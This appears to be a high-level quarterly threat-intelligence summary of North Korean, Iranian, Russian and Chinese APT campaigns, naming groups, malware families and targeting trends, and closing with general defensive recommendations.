North Korean APT groups have continued their sophisticated campaigns in Q3, exemplifying their adaptability and evolving tactics. Kimsuky (APT43) employed deceptive batch files to target systems, masquerading as document viewers. They leveraged Chrome Remote Desktop and AppleSeed malware for remote control, emphasizing the need for vigilance with email attachments. Lazarus Group (UNC4899) executed a supply chain compromise and targeted a US software provider, underscoring their inclination for innovative attack vectors. In a separate incident, they attacked a Spanish aerospace company through LinkedIn messages. ScarCruft introduced LNK-format malware, departing from their previous CHM tactic, necessitating user caution with suspicious file formats. North Korean threat actors persist as formidable cyber adversaries, showcasing ongoing evolution in their strategies.
Throughout the observed campaigns, Iranian threat actors primarily relied on spear-phishing emails to initiate their attacks, often followed by vulnerability exploitation and password-spraying techniques. Their primary targets remained Middle Eastern and European countries, where the aim was largely espionage. Meanwhile, Russian APT activities were notably associated with the ongoing armed conflict in Ukraine, focusing on both NATO countries and Ukraine itself. Their targets ranged from government institutions to critical industries. Chinese APTs expanded their reach to the Middle East, Asia, and critical infrastructure in the United States, with a noticeable expansion into mobile platforms. Lastly, North Korean APT groups strived to develop a robust nuclear triad, but limited resources prompted them to turn to cyber espionage, with a particular focus on maritime and aerospace technology acquisition.
These observations collectively underscore the ever-evolving nature of APT activities, highlighting the need for sustained vigilance, user education, and the rapid deployment of software updates as crucial defense mechanisms in the face of an agile and persistent threat landscape. As APT groups continually refine their techniques, maintaining an advantage in cybersecurity remains an ongoing challenge for both organizations and governments.